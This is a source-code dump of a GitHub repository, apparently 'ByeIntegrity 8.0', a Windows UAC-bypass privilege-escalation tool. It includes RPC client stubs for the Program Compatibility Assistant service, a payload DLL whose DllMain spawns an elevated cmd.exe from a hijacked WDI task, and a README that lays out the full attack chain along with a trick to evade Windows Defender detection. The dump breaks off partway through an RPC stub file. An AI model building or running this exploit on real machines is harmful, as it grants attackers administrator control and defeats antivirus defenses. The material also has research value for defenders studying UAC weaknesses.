├── example.apng ├── ByeIntegrity8 ├── pcasvc.acf ├── pcasvc7.acf ├── pcasvc7.idl ├── pcasvc.idl ├── resource.h ├── ByeIntegrity8.vcxproj.filters ├── ByeIntegrity8.rc ├── pcasvc.h ├── pcasvc7.h ├── pcasvc7_c.c ├── ByeIntegrity8.vcxproj ├── pcasvc_c.c └── byeintegrity8.c ├── PcaPayload ├── PcaPayload.vcxproj.filters ├── payload.c └── PcaPayload.vcxproj ├── byeintegrity8-uac.sln ├── .gitattributes ├── README.md ├── .gitignore └── diagram.svg /example.apng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AzAgarampur/byeintegrity8-uac/HEAD/example.apng -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc.acf: -------------------------------------------------------------------------------- 1 | [ 2 | explicit_handle 3 | ] 4 | interface PcaService 5 | { 6 | RAiMonitorProcess(); 7 | } -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc7.acf: -------------------------------------------------------------------------------- 1 | [ 2 | explicit_handle 3 | ] 4 | interface PcaService7 5 | { 6 | RAiNotifyUserCallbackExceptionProcess(); 7 | } -------------------------------------------------------------------------------- /PcaPayload/PcaPayload.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc7.idl: -------------------------------------------------------------------------------- 1 | [ 2 | uuid(0767a036-0d22-48aa-ba69-b619480f38cb), 3 | version(1.0), 4 | ] 5 | interface PcaService7 6 | { 7 | long RAiNotifyUserCallbackExceptionProcess( 8 | handle_t bindingHandle, 9 | [in][string] wchar_t* exePathName, 10 | [in]long unknown0, 11 | [in]long processId 12 | ); 13 | } -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc.idl: -------------------------------------------------------------------------------- 1 | [ 2 | uuid(0767a036-0d22-48aa-ba69-b619480f38cb), 3 | version(1.0), 4 | ] 5 | interface PcaService 6 | { 7 | long RAiMonitorProcess( 8 | handle_t bindingHandle, 9 | [in]unsigned __int3264 hProcess, 10 | [in]long unknown0, 11 | [in][unique][string]wchar_t* exeFileName, 12 | [in][unique][string]wchar_t* cmdLine, 13 | [in][unique][string]wchar_t* workingDir, 14 | [in]long flags 15 | ); 16 | } -------------------------------------------------------------------------------- /ByeIntegrity8/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by ByeIntegrity8.rc 4 | // 5 | #define IDR_PAYLOAD1 101 6 | 7 | // Next default values for new objects 8 | // 9 | #ifdef APSTUDIO_INVOKED 10 | #ifndef APSTUDIO_READONLY_SYMBOLS 11 | #define _APS_NEXT_RESOURCE_VALUE 102 12 | #define _APS_NEXT_COMMAND_VALUE 40001 13 | #define _APS_NEXT_CONTROL_VALUE 1001 14 | #define _APS_NEXT_SYMED_VALUE 101 15 | #endif 16 | #endif 17 | -------------------------------------------------------------------------------- /ByeIntegrity8/ByeIntegrity8.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | IDL 20 | 21 | 22 | IDL 23 | 24 | 25 | IDL 26 | 27 | 28 | 29 | 30 | {49e5c2b1-4d1b-4cdf-b186-b1e86110bf4a} 31 | 32 | 33 | 34 | 35 | IDL 36 | 37 | 38 | -------------------------------------------------------------------------------- /ByeIntegrity8/ByeIntegrity8.rc: -------------------------------------------------------------------------------- 1 | // Microsoft Visual C++ generated resource script. 2 | // 3 | #include "resource.h" 4 | 5 | #define APSTUDIO_READONLY_SYMBOLS 6 | ///////////////////////////////////////////////////////////////////////////// 7 | // 8 | // Generated from the TEXTINCLUDE 2 resource. 9 | // 10 | #include "winres.h" 11 | 12 | ///////////////////////////////////////////////////////////////////////////// 13 | #undef APSTUDIO_READONLY_SYMBOLS 14 | 15 | ///////////////////////////////////////////////////////////////////////////// 16 | // English (United States) resources 17 | 18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU) 19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 20 | #pragma code_page(1252) 21 | 22 | #ifdef APSTUDIO_INVOKED 23 | ///////////////////////////////////////////////////////////////////////////// 24 | // 25 | // TEXTINCLUDE 26 | // 27 | 28 | 1 TEXTINCLUDE 29 | BEGIN 30 | "resource.h\0" 31 | END 32 | 33 | 2 TEXTINCLUDE 34 | BEGIN 35 | "#include ""winres.h""\r\n" 36 | "\0" 37 | END 38 | 39 | 3 TEXTINCLUDE 40 | BEGIN 41 | "\r\n" 42 | "\0" 43 | END 44 | 45 | #endif // APSTUDIO_INVOKED 46 | 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | // 50 | // PAYLOAD 51 | // 52 | 53 | IDR_PAYLOAD1 PAYLOAD "..\\x64\\Release\\PcaPayload.dll" 54 | 55 | #endif // English (United States) resources 56 | ///////////////////////////////////////////////////////////////////////////// 57 | 58 | 59 | 60 | #ifndef APSTUDIO_INVOKED 61 | ///////////////////////////////////////////////////////////////////////////// 62 | // 63 | // Generated from the TEXTINCLUDE 3 resource. 64 | // 65 | 66 | 67 | ///////////////////////////////////////////////////////////////////////////// 68 | #endif // not APSTUDIO_INVOKED 69 | 70 | -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 19:14:07 2038 8 | */ 9 | /* Compiler settings for pcasvc.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | 34 | #ifndef __pcasvc_h__ 35 | #define __pcasvc_h__ 36 | 37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | /* Forward Declarations */ 42 | 43 | #ifdef __cplusplus 44 | extern "C"{ 45 | #endif 46 | 47 | 48 | #ifndef __PcaService_INTERFACE_DEFINED__ 49 | #define __PcaService_INTERFACE_DEFINED__ 50 | 51 | /* interface PcaService */ 52 | /* [explicit_handle][version][uuid] */ 53 | 54 | long RAiMonitorProcess( 55 | handle_t bindingHandle, 56 | /* [in] */ unsigned __int3264 hProcess, 57 | /* [in] */ long unknown0, 58 | /* [string][unique][in] */ wchar_t *exeFileName, 59 | /* [string][unique][in] */ wchar_t *cmdLine, 60 | /* [string][unique][in] */ wchar_t *workingDir, 61 | /* [in] */ long flags); 62 | 63 | 64 | 65 | extern RPC_IF_HANDLE PcaService_v1_0_c_ifspec; 66 | extern RPC_IF_HANDLE PcaService_v1_0_s_ifspec; 67 | #endif /* __PcaService_INTERFACE_DEFINED__ */ 68 | 69 | /* Additional Prototypes for ALL interfaces */ 70 | 71 | /* end of Additional Prototypes */ 72 | 73 | #ifdef __cplusplus 74 | } 75 | #endif 76 | 77 | #endif 78 | 79 | 80 | -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc7.h: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | * I HAVE EDITED THIS FILE BY HAND IN ORDER TO MAKE THIS WORK 4 | * THIS IS NOT THE PURE OUTPUT OF MIDL.EXE 5 | * 6 | * IF YOU ARE COMPILING THE IDL YOURSELF YOU MUST EDIT THE PROCEDURE 7 | * NUMBER IN THIS GENERATED FILE IN ORDER FOR THE CALL TO WORK 8 | */ 9 | 10 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 11 | 12 | 13 | /* File created by MIDL compiler version 8.01.0622 */ 14 | /* at Mon Jan 18 19:14:07 2038 15 | */ 16 | /* Compiler settings for pcasvc7.idl, pcasvc7.acf: 17 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 18 | protocol : dce , ms_ext, c_ext, robust 19 | error checks: allocation ref bounds_check enum stub_data 20 | VC __declspec() decoration level: 21 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 22 | DECLSPEC_UUID(), MIDL_INTERFACE() 23 | */ 24 | /* @@MIDL_FILE_HEADING( ) */ 25 | 26 | #pragma warning( disable: 4049 ) /* more than 64k source lines */ 27 | 28 | 29 | /* verify that the version is high enough to compile this file*/ 30 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 31 | #define __REQUIRED_RPCNDR_H_VERSION__ 475 32 | #endif 33 | 34 | #include "rpc.h" 35 | #include "rpcndr.h" 36 | 37 | #ifndef __RPCNDR_H_VERSION__ 38 | #error this stub requires an updated version of 39 | #endif /* __RPCNDR_H_VERSION__ */ 40 | 41 | 42 | #ifndef __pcasvc7_h__ 43 | #define __pcasvc7_h__ 44 | 45 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 46 | #pragma once 47 | #endif 48 | 49 | /* Forward Declarations */ 50 | 51 | #ifdef __cplusplus 52 | extern "C"{ 53 | #endif 54 | 55 | 56 | #ifndef __PcaService7_INTERFACE_DEFINED__ 57 | #define __PcaService7_INTERFACE_DEFINED__ 58 | 59 | /* interface PcaService7 */ 60 | /* [explicit_handle][version][uuid] */ 61 | 62 | long RAiNotifyUserCallbackExceptionProcess( 63 | handle_t bindingHandle, 64 | /* [string][in] */ wchar_t *exePathName, 65 | /* [in] */ long unknown0, 66 | /* [in] */ long processId); 67 | 68 | 69 | 70 | extern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec; 71 | extern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec; 72 | #endif /* __PcaService7_INTERFACE_DEFINED__ */ 73 | 74 | /* Additional Prototypes for ALL interfaces */ 75 | 76 | /* end of Additional Prototypes */ 77 | 78 | #ifdef __cplusplus 79 | } 80 | #endif 81 | 82 | #endif 83 | 84 | 85 | -------------------------------------------------------------------------------- /byeintegrity8-uac.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31424.327 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ByeIntegrity8", "ByeIntegrity8\ByeIntegrity8.vcxproj", "{F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0} = {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0} 9 | EndProjectSection 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PcaPayload", "PcaPayload\PcaPayload.vcxproj", "{2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}" 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|x64 = Debug|x64 16 | Debug|x86 = Debug|x86 17 | Release|x64 = Release|x64 18 | Release|x86 = Release|x86 19 | EndGlobalSection 20 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 21 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x64.ActiveCfg = Debug|x64 22 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x64.Build.0 = Debug|x64 23 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x86.ActiveCfg = Debug|Win32 24 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x86.Build.0 = Debug|Win32 25 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x64.ActiveCfg = Release|x64 26 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x64.Build.0 = Release|x64 27 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x86.ActiveCfg = Release|Win32 28 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x86.Build.0 = Release|Win32 29 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x64.ActiveCfg = Debug|x64 30 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x64.Build.0 = Debug|x64 31 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x86.ActiveCfg = Debug|Win32 32 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x86.Build.0 = Debug|Win32 33 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x64.ActiveCfg = Release|x64 34 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x64.Build.0 = Release|x64 35 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x86.ActiveCfg = Release|Win32 36 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x86.Build.0 = Release|Win32 37 | EndGlobalSection 38 | GlobalSection(SolutionProperties) = preSolution 39 | HideSolutionNode = FALSE 40 | EndGlobalSection 41 | GlobalSection(ExtensibilityGlobals) = postSolution 42 | SolutionGuid = {60EC33C9-4F9B-4717-8291-2CD7D75F1047} 43 | EndGlobalSection 44 | EndGlobal 45 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /PcaPayload/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | __declspec(dllexport) HRESULT WdiHandleInstance( 5 | PVOID instanceData, 6 | int unused1 7 | ) 8 | { 9 | UNREFERENCED_PARAMETER(instanceData); 10 | UNREFERENCED_PARAMETER(unused1); 11 | 12 | /* Called to handle the diagnostic instance in the queue (program compatibility assistance in our case), 13 | * does not seem to matter if return code is success or error (maybe it does for Wdi logging.) */ 14 | return S_OK; 15 | } 16 | 17 | __declspec(dllexport) HRESULT WdiDiagnosticModuleMain( 18 | void* unused0, 19 | int unused1 20 | ) 21 | { 22 | UNREFERENCED_PARAMETER(unused0); 23 | UNREFERENCED_PARAMETER(unused0); 24 | 25 | // must return a success code otherwise module is unloaded and queue isn't flushed 26 | return S_OK; 27 | } 28 | 29 | __declspec(dllexport) ULONG_PTR WdiGetDiagnosticModuleInterfaceVersion() { return 1ULL; } 30 | 31 | PWSTR PaConcatString( 32 | PWSTR string, 33 | PWSTR appendString 34 | ) 35 | { 36 | PWSTR data = (PWSTR)HeapAlloc(GetProcessHeap(), 0, 37 | ((wcslen(string) * sizeof(WCHAR)) + sizeof(L'\0')) + 38 | ((wcslen(appendString) * sizeof(WCHAR)) + sizeof(L'\0'))); 39 | if (data) { 40 | memcpy(data, string, wcslen(string) * sizeof(WCHAR)); 41 | memcpy(data + wcslen(string), appendString, 42 | (wcslen(appendString) * sizeof(WCHAR)) + sizeof(L'\0')); 43 | } 44 | return data; 45 | } 46 | 47 | BOOL WINAPI DllMain( 48 | HINSTANCE hInstance, 49 | DWORD reason, 50 | LPVOID reserved 51 | ) 52 | { 53 | UNREFERENCED_PARAMETER(hInstance); 54 | UNREFERENCED_PARAMETER(reserved); 55 | 56 | if (reason == DLL_PROCESS_ATTACH) 57 | { 58 | PWSTR winDir = NULL, system32 = NULL; 59 | HRESULT hr; 60 | BOOL exitCode = FALSE; 61 | PUCHAR exeName = NULL; 62 | PWSTR cmdPath = NULL; 63 | STARTUPINFOW si; 64 | PROCESS_INFORMATION pi; 65 | HANDLE hSharedMemory, hEvent = NULL; 66 | WCHAR stopCmd[2]; 67 | 68 | hSharedMemory = OpenFileMappingW(FILE_MAP_WRITE, FALSE, L"ByeIntegrity8"); 69 | if (!hSharedMemory) 70 | goto eof; 71 | 72 | exeName = MapViewOfFile(hSharedMemory, FILE_MAP_WRITE, 0, 0, 0); 73 | if (!exeName) 74 | goto eof; 75 | 76 | hEvent = OpenEventW(EVENT_MODIFY_STATE, FALSE, L"ByeIntegrity8Loaded"); 77 | if (!hEvent) 78 | goto eof; 79 | 80 | hr = SHGetKnownFolderPath(&FOLDERID_Windows, 0, NULL, &winDir); 81 | if (!SUCCEEDED(hr)) 82 | goto eof; 83 | 84 | hr = SHGetKnownFolderPath(&FOLDERID_System, 0, NULL, &system32); 85 | if (!SUCCEEDED(hr)) 86 | goto eof; 87 | 88 | cmdPath = PaConcatString(system32, L"\\cmd.exe"); 89 | if (!cmdPath) 90 | goto eof; 91 | 92 | if (!SetEnvironmentVariableW(L"windir", winDir)) 93 | goto eof; 94 | 95 | ZeroMemory(&si, sizeof(STARTUPINFOW)); 96 | si.cb = sizeof(STARTUPINFOW); 97 | if (!CreateProcessW(cmdPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) 98 | goto eof; 99 | 100 | CloseHandle(pi.hProcess); 101 | CloseHandle(pi.hThread); 102 | 103 | stopCmd[0] = L'2'; 104 | stopCmd[1] = L'\0'; 105 | if (CreateProcessW((LPCWSTR)exeName, stopCmd, NULL, NULL, FALSE, 106 | CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { 107 | CloseHandle(pi.hProcess); 108 | CloseHandle(pi.hThread); 109 | } 110 | 111 | SetEvent(hEvent); 112 | exitCode = TRUE; 113 | 114 | eof: 115 | if (hSharedMemory) 116 | CloseHandle(hSharedMemory); 117 | if (hEvent) 118 | CloseHandle(hEvent); 119 | if (exeName) 120 | UnmapViewOfFile(exeName); 121 | if (winDir) 122 | CoTaskMemFree(winDir); 123 | if (system32) 124 | CoTaskMemFree(system32); 125 | if (cmdPath) 126 | HeapFree(GetProcessHeap(), 0, cmdPath); 127 | return exitCode; 128 | } 129 | return TRUE; 130 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![](example.apng) 2 | 3 |

4 |

5 | ByeIntegrity 8.0 6 |

7 |

8 | 9 | The eighth Windows privilege escalation attack in the ByeIntegrity family. ByeIntegrity 8.0 is the most complex one I've created so far; however, because of its complexity, it's able to reveal and exploit hidden design and security flaws in the operating system. After all, it even works when UAC is set to its maximum security level — **AlwaysNotify**. 10 | 11 | ## Attack overview 12 | Just like every other ByeIntegrity attack, ByeIntegrity 8.0 needs to be run under an account with administrator privileges. ByeIntegrity 8.0 relies on the Task Scheduler to start the *WDI ResolutionHost* task. The task is started with an elevated token of the current user that the task scheduler creates. The task proceeds to read parameters from the WDI host and reads from the registry to figure out where to load the requested diagnostic module. These module paths are stored in the registry with the form `%WinDir%\System32\...`. ByeIntegrity 8.0 sets a custom `WinDir` environment variable to load its own payload module into the *ResolutionHost* task, which then launches any program inheriting the full administrative privileges. 13 | 14 | ## How it works 15 | The majority of the ByeIntegrity 8.0 attack is getting the *WDI ResolutionHost* started. This task is triggered to start via an ETW event. There are many services which write events to trigger the task (Windows Resource Exhaustion, Corrupted File Recovery, etc.). 16 | 17 | The Program Compatibility Assistant (PCA) is part of Windows's *Application Experience*, and will automatically monitor processes for problematic behaviors and attempt to resolve them. It is implemented as a service, *PcaSvc*, and in a set of libraries, `apphelp.dll`, being one of them. `apphelp.dll` will hook certain WinAPI functions depending on what *genome* (Application type: Win7RTM, WinBlueRTM, etc.) *PcaSvc* decides the process contains. `apphelp.dll` intercepts the function calls and reports back any possible results to *PcaSvc* via writing ETW events. *PcaSvc* inspects the event information, and if it matches a threshold, *PcaSvc* will attempt to start the *Program Compatibility Assistant Troubleshooter*. This is implemented as a diagnostic module (DM), and it is loaded via the *WDI ResolutionHost* task. *PcaSvc* starts this task with its parameters by triggering it via the PCA's "start diagnostics" ETW event write. (If you're thinking of simply writing this ETW event manually to launch the DM, you'll be greeted with an *Access is denied* error.) 18 | # 19 | ByeIntegrity 8.0 creates this sequence of events in a controlled, exploitable manner. On Windows 8+, only processes launched from Windows Explorer are monitored *PcaSvc*, as explorer calls `pcacli!PcaMonitorProcess` to tell *PcaSvc* to start monitoring the process for events. ByeIntegrity 8.0 uses RPC to talk directly to *PcaSvc* to tell it to monitor the "trigger" process ByeIntegrity 8.0 launches. Talking directly via RPC to *PcaSvc* is better, faster, more controlled, and it also allows ByeIntegrity 8.0 to also bypass a policy that can disable the PCA if it is set. The "trigger" process writes two ETW events that `apphelp.dll` would usually write if it detects a program is displaying an error message box about running on an incorrect version of Windows. 20 | 21 | On Windows 7, a different method is used. If the PCA detects an unhandled exception that occurs during a user callback, it will attempt to launch the DM. *PcaSvc* monitors all processes launched, nothing is required from explorer here. If such an exception is caught, *PcaSvc* will launch the DM. The function that Windows 7's *PcaSvc* uses to handle detection of an unhandled callback exception is actually an RPC function that *PcaSvc* calls from itself. ByeIntegrity 8.0 once again uses RPC to call this function remotely, triggering the launch of the DM manually. 22 | # 23 | Once the DM is launched, it loads the ByeIntegrity 8.0 *Pca Payload*. This payload acts as a WDI diagnostic module. When loaded, it creates the requested process as a child of the *WDI ResolutionHost* task executable (`taskhostw.exe`). The payload needs to export a few WDI functions in order to function properly. These functions initialize the WDI diagnostics instance (PCA diagnostics in this case) and then flush the diagnostics queue so that ByeIntegrity 8.0 can be run multiple times and so that the PCA does not re-launch the DM multiple times because of the diagnostic instance still being in the queue. Finally, the task is stopped and after cleanup, the whole process can be repeated again. 24 | 25 | ## Attack schema + Windows Defender bypass 26 | 27 | Evident from the above, this is a pretty complex attack that abuses many things: 28 | 29 | - Program Compatibility Assistant 30 | - Poor Windows Defender design 31 | - Environment variables 32 | - Task Scheduler 33 | - DLL Hijack 34 | - ETW 35 | - RPC 36 | - WDI 37 | 38 |

39 |

Complete attack diagram

40 | 41 | ![](diagram.svg) 42 |

43 | 44 | Windows Defender was discovered to be a small annoyance while developing this attack. Windows Defender's filter driver catches the creation of a rouge `WinDir` value in the `HKCU\Environment` key. If caught, Windows Defender will eventually kill the offending process. The problem is there is a huge delay after the notification from the filter driver and the action taken by Windows Defender. Every time, Windows Defender completely misses the attack. In order to bypass even detection by Windows Defender, ByeIntegrity 8.0 renames the `HKCU\Environment` key a random name, creates `WinDir` in the fake key, then renames it back to `HKCU\Environment`. And Windows Defender doesn’t even notice a thing. Credit for this trick — **@hfiref0x** — who discovered it while working on UACMe method integration. 45 | 46 | ## UACMe 47 | ByeIntegrity 8.0 is implemented in UACMe as method number 69. Implementations are the exact same except UACMe uses only `NdrClientCall2` for RPC calls, and does not use the custom `RpcBindingSetOption()` that ByeIntegrity 8.0 uses. These two differences don't change anything about the attack. 48 | 49 | ## Using the code 50 | If you’re reading this then you probably know how to compile the source. Just note that this hasn’t been tested or designed with x86 in mind at all, and it probably won’t work on x86 anyways. 51 | 52 | Just like UACMe, **I will never upload compiled binaries to this repo.** There are always people who want the world to crash and burn, and I'm not going to provide an easy route for them to run this on somebody else's computer and cause intentional damage. I also don't want script-kiddies to use this attack without understanding what it does and the damage it can cause. 53 | 54 | ## Supported versions 55 | ByeIntegrity 8.0 works from Windows 7 until the latest version of Windows. -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc7_c.c: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | * I HAVE EDITED THIS FILE BY HAND IN ORDER TO MAKE THIS WORK 4 | * THIS IS NOT THE PURE OUTPUT OF MIDL.EXE 5 | * 6 | * IF YOU ARE COMPILING THE IDL YOURSELF YOU MUST EDIT THE PROCEDURE 7 | * NUMBER IN THIS GENERATED FILE IN ORDER FOR THE CALL TO WORK 8 | */ 9 | 10 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 11 | 12 | 13 | /* File created by MIDL compiler version 8.01.0622 */ 14 | /* at Mon Jan 18 19:14:07 2038 15 | */ 16 | /* Compiler settings for pcasvc7.idl, pcasvc7.acf: 17 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 18 | protocol : dce , ms_ext, c_ext, robust 19 | error checks: allocation ref bounds_check enum stub_data 20 | VC __declspec() decoration level: 21 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 22 | DECLSPEC_UUID(), MIDL_INTERFACE() 23 | */ 24 | /* @@MIDL_FILE_HEADING( ) */ 25 | 26 | #if defined(_M_AMD64) 27 | 28 | 29 | #pragma warning( disable: 4049 ) /* more than 64k source lines */ 30 | #if _MSC_VER >= 1200 31 | #pragma warning(push) 32 | #endif 33 | 34 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 35 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 36 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 37 | 38 | #include 39 | 40 | #include "pcasvc7.h" 41 | 42 | #define TYPE_FORMAT_STRING_SIZE 7 43 | #define PROC_FORMAT_STRING_SIZE 55 44 | #define EXPR_FORMAT_STRING_SIZE 1 45 | #define TRANSMIT_AS_TABLE_SIZE 0 46 | #define WIRE_MARSHAL_TABLE_SIZE 0 47 | 48 | typedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING 49 | { 50 | short Pad; 51 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 52 | } pcasvc7_MIDL_TYPE_FORMAT_STRING; 53 | 54 | typedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING 55 | { 56 | short Pad; 57 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 58 | } pcasvc7_MIDL_PROC_FORMAT_STRING; 59 | 60 | typedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING 61 | { 62 | long Pad; 63 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 64 | } pcasvc7_MIDL_EXPR_FORMAT_STRING; 65 | 66 | 67 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 68 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 69 | 70 | 71 | extern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString; 72 | extern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString; 73 | extern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString; 74 | 75 | #define GENERIC_BINDING_TABLE_SIZE 0 76 | 77 | 78 | /* Standard interface: PcaService7, ver. 1.0, 79 | GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */ 80 | 81 | 82 | 83 | static const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface = 84 | { 85 | sizeof(RPC_CLIENT_INTERFACE), 86 | {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}}, 87 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 88 | 0, 89 | 0, 90 | 0, 91 | 0, 92 | 0, 93 | 0x00000000 94 | }; 95 | RPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface; 96 | 97 | extern const MIDL_STUB_DESC PcaService7_StubDesc; 98 | 99 | static RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle; 100 | 101 | 102 | long RAiNotifyUserCallbackExceptionProcess( 103 | handle_t bindingHandle, 104 | /* [string][in] */ wchar_t *exePathName, 105 | /* [in] */ long unknown0, 106 | /* [in] */ long processId) 107 